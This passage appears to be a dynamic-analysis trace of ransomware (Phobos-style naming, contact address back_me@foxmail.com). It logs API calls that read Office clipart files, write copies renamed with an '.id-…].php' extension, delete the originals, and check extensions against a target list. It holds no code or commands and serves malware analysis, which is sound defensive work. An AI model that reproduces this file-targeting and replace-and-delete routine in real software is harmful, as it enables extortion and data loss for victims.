Office\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106222.wmf")) returned 1 [0260.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63 [0260.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63 [0260.075] lstrlenW (lpString=".doc") returned 4 [0260.075] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.075] lstrlenW (lpString=".docx") returned 5 [0260.075] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0260.075] lstrlenW (lpString=".pdf") returned 4 [0260.075] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.075] lstrlenW (lpString=".xls") returned 4 [0260.075] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.075] lstrlenW (lpString=".xlsx") returned 5 [0260.075] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0260.075] lstrlenW (lpString=".ppt") returned 4 [0260.075] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63 [0260.075] lstrlenW (lpString=".zip") returned 4 [0260.075] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.075] lstrlenW (lpString=".rar") returned 4 [0260.075] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.075] lstrlenW (lpString=".bz2") returned 4 [0260.075] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.075] lstrlenW (lpString=".7z") returned 3 [0260.075] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63 [0260.075] lstrlenW (lpString=".dbf") returned 4 [0260.075] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63 [0260.075] lstrlenW (lpString=".1cd") returned 4 [0260.075] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63 [0260.076] lstrlenW (lpString=".jpg") returned 4 [0260.076] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63 [0260.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63 [0260.076] lstrlenW (lpString=".doc") returned 4 [0260.076] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.076] lstrlenW (lpString=".docx") returned 5 [0260.076] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0260.076] lstrlenW (lpString=".pdf") returned 4 [0260.076] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.076] lstrlenW (lpString=".xls") returned 4 [0260.076] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.076] lstrlenW (lpString=".xlsx") returned 5 [0260.076] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0260.076] lstrlenW (lpString=".ppt") returned 4 [0260.076] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63 [0260.076] lstrlenW (lpString=".zip") returned 4 [0260.076] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.076] lstrlenW (lpString=".rar") returned 4 [0260.076] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.076] lstrlenW (lpString=".bz2") returned 4 [0260.076] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.076] lstrlenW (lpString=".7z") returned 3 [0260.076] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63 [0260.076] lstrlenW (lpString=".dbf") returned 4 [0260.076] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63 [0260.076] lstrlenW (lpString=".1cd") returned 4 [0260.076] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106222.WMF") returned 63 [0260.077] lstrlenW (lpString=".jpg") returned 4 [0260.077] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.077] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0260.077] lstrlenW (lpString="J0106572.WMF") returned 12 [0260.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0260.078] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=2148) returned 1 [0260.078] CloseHandle (hObject=0x3d8) returned 1 [0260.078] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf")) returned 0x20 [0260.078] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0260.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0260.078] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.078] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0 [0260.079] GetLastError () returned 0x0 [0260.079] ReadFile (in: hFile=0x3d8, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x864, lpOverlapped=0x0) returned 1 [0260.080] WriteFile (in: hFile=0x3e0, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x870, lpOverlapped=0x0) returned 1 [0260.081] ReadFile (in: hFile=0x3d8, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0260.081] WriteFile (in: hFile=0x3e0, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0260.081] SetEndOfFile (hFile=0x3e0) returned 1 [0260.081] CloseHandle (hObject=0x3e0) returned 1 [0260.081] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.081] SetEndOfFile (hFile=0x3d8) returned 1 [0260.083] CloseHandle (hObject=0x3d8) returned 1 [0260.083] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0260.083] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106572.wmf")) returned 1 [0260.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63 [0260.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63 [0260.083] lstrlenW (lpString=".doc") returned 4 [0260.084] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.084] lstrlenW (lpString=".docx") returned 5 [0260.084] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0260.084] lstrlenW (lpString=".pdf") returned 4 [0260.084] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.084] lstrlenW (lpString=".xls") returned 4 [0260.084] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.084] lstrlenW (lpString=".xlsx") returned 5 [0260.084] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0260.084] lstrlenW (lpString=".ppt") returned 4 [0260.084] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63 [0260.084] lstrlenW (lpString=".zip") returned 4 [0260.084] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.084] lstrlenW (lpString=".rar") returned 4 [0260.084] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.084] lstrlenW (lpString=".bz2") returned 4 [0260.084] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.084] lstrlenW (lpString=".7z") returned 3 [0260.084] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63 [0260.084] lstrlenW (lpString=".dbf") returned 4 [0260.084] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63 [0260.084] lstrlenW (lpString=".1cd") returned 4 [0260.084] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63 [0260.084] lstrlenW (lpString=".jpg") returned 4 [0260.084] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63 [0260.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63 [0260.084] lstrlenW (lpString=".doc") returned 4 [0260.085] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.085] lstrlenW (lpString=".docx") returned 5 [0260.085] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0260.085] lstrlenW (lpString=".pdf") returned 4 [0260.085] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.085] lstrlenW (lpString=".xls") returned 4 [0260.085] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.085] lstrlenW (lpString=".xlsx") returned 5 [0260.085] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0260.085] lstrlenW (lpString=".ppt") returned 4 [0260.085] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63 [0260.085] lstrlenW (lpString=".zip") returned 4 [0260.085] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.085] lstrlenW (lpString=".rar") returned 4 [0260.085] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.085] lstrlenW (lpString=".bz2") returned 4 [0260.085] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.085] lstrlenW (lpString=".7z") returned 3 [0260.085] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63 [0260.085] lstrlenW (lpString=".dbf") returned 4 [0260.085] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63 [0260.085] lstrlenW (lpString=".1cd") returned 4 [0260.085] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106572.WMF") returned 63 [0260.085] lstrlenW (lpString=".jpg") returned 4 [0260.085] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.085] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0260.086] lstrlenW (lpString="J0106816.WMF") returned 12 [0260.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0260.086] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=3332) returned 1 [0260.086] CloseHandle (hObject=0x3d8) returned 1 [0260.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf")) returned 0x20 [0260.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0260.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0260.086] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.086] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0 [0260.087] GetLastError () returned 0x0 [0260.087] ReadFile (in: hFile=0x3d8, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0xd04, lpOverlapped=0x0) returned 1 [0260.088] WriteFile (in: hFile=0x3e0, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xd10, lpOverlapped=0x0) returned 1 [0260.089] ReadFile (in: hFile=0x3d8, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0260.089] WriteFile (in: hFile=0x3e0, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0260.089] SetEndOfFile (hFile=0x3e0) returned 1 [0260.089] CloseHandle (hObject=0x3e0) returned 1 [0260.089] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.089] SetEndOfFile (hFile=0x3d8) returned 1 [0260.091] CloseHandle (hObject=0x3d8) returned 1 [0260.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0260.091] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106816.wmf")) returned 1 [0260.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63 [0260.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63 [0260.092] lstrlenW (lpString=".doc") returned 4 [0260.092] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.092] lstrlenW (lpString=".docx") returned 5 [0260.092] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0260.092] lstrlenW (lpString=".pdf") returned 4 [0260.092] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.092] lstrlenW (lpString=".xls") returned 4 [0260.092] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.092] lstrlenW (lpString=".xlsx") returned 5 [0260.092] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0260.092] lstrlenW (lpString=".ppt") returned 4 [0260.092] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63 [0260.092] lstrlenW (lpString=".zip") returned 4 [0260.092] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.092] lstrlenW (lpString=".rar") returned 4 [0260.092] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.092] lstrlenW (lpString=".bz2") returned 4 [0260.092] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.092] lstrlenW (lpString=".7z") returned 3 [0260.092] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63 [0260.092] lstrlenW (lpString=".dbf") returned 4 [0260.092] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63 [0260.092] lstrlenW (lpString=".1cd") returned 4 [0260.092] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63 [0260.092] lstrlenW (lpString=".jpg") returned 4 [0260.092] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63 [0260.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63 [0260.093] lstrlenW (lpString=".doc") returned 4 [0260.093] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.093] lstrlenW (lpString=".docx") returned 5 [0260.093] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0260.093] lstrlenW (lpString=".pdf") returned 4 [0260.093] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.093] lstrlenW (lpString=".xls") returned 4 [0260.093] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.093] lstrlenW (lpString=".xlsx") returned 5 [0260.093] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0260.093] lstrlenW (lpString=".ppt") returned 4 [0260.093] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63 [0260.093] lstrlenW (lpString=".zip") returned 4 [0260.093] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.093] lstrlenW (lpString=".rar") returned 4 [0260.093] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.093] lstrlenW (lpString=".bz2") returned 4 [0260.093] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.093] lstrlenW (lpString=".7z") returned 3 [0260.093] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63 [0260.093] lstrlenW (lpString=".dbf") returned 4 [0260.093] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63 [0260.093] lstrlenW (lpString=".1cd") returned 4 [0260.093] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63 [0260.093] lstrlenW (lpString=".jpg") returned 4 [0260.093] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.094] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0260.094] lstrlenW (lpString="J0106958.WMF") returned 12 [0260.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0260.094] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=13784) returned 1 [0260.094] CloseHandle (hObject=0x3d8) returned 1 [0260.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf")) returned 0x20 [0260.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0260.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0260.094] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.094] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0 [0260.095] GetLastError () returned 0x0 [0260.095] ReadFile (in: hFile=0x3d8, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x35d8, lpOverlapped=0x0) returned 1 [0260.318] WriteFile (in: hFile=0x3e0, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x35e0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x35e0, lpOverlapped=0x0) returned 1 [0260.319] ReadFile (in: hFile=0x3d8, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0260.319] WriteFile (in: hFile=0x3e0, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0260.319] SetEndOfFile (hFile=0x3e0) returned 1 [0260.319] CloseHandle (hObject=0x3e0) returned 1 [0260.319] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.319] SetEndOfFile (hFile=0x3d8) returned 1 [0260.321] CloseHandle (hObject=0x3d8) returned 1 [0260.322] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0260.563] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf")) returned 1 [0260.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63 [0260.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63 [0260.563] lstrlenW (lpString=".doc") returned 4 [0260.563] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.564] lstrlenW (lpString=".docx") returned 5 [0260.564] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0260.564] lstrlenW (lpString=".pdf") returned 4 [0260.564] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.564] lstrlenW (lpString=".xls") returned 4 [0260.564] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.564] lstrlenW (lpString=".xlsx") returned 5 [0260.564] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0260.564] 